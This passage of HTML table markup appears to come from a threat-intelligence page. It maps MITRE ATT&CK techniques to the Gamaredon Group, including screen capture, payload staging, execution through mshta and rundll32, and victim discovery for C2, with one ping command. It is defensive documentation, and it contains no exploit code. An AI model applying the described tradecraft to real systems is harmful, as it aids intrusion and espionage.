background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1113"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1113</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1113"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Screen 
Capture</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">'s malware can take screenshots of the compromised computer every minute.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid 
#dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1608"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1608</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1608/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1608"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Stage Capabilities</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a 
href="https://attack.mitre.org/techniques/T1608/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Upload Malware</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has registered domains to stage payloads.</span><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a><a href="https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[8]</span></a></p></td></tr><tr style="height:29.25pt;"><td 
style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1218"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1218</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1218/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.005</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p 
style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1218"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Binary Proxy Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1218/005"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Mshta</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used </span><span style="font-size: 10.5pt; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: 
normal; font-variant-alternates: normal; vertical-align: baseline;">mshta.exe</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> to execute malicious HTA files.</span><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[4]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1218/011"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.011</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 
8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1218"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Binary Proxy Execution</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1218/011"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Rundll32</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> malware has used rundll32 to launch additional malicious components.</span><a 
href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1082"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1082</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1082"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); 
background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Information Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">A </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: 
transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1016"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1016</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p 
style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1016/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1016"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Network Configuration Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1016/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Internet Connection Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: 
Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has tested connectivity between a compromised machine and a C2 server using </span><a href="https://attack.mitre.org/software/S0097"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ping</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> with commands such as </span><span style="font-size: 10.5pt; font-family: monospace; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">CSIDL_SYSTEM\cmd.exe /c ping -n 1</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.</span><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; 
vertical-align: baseline;">[4]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1033"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1033</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1033"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Owner/User Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid 
#dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">A </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> file stealer can gather the victim's username to send to a C2 server.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; 
vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1080"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1080</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1080"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Taint Shared Content</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); 
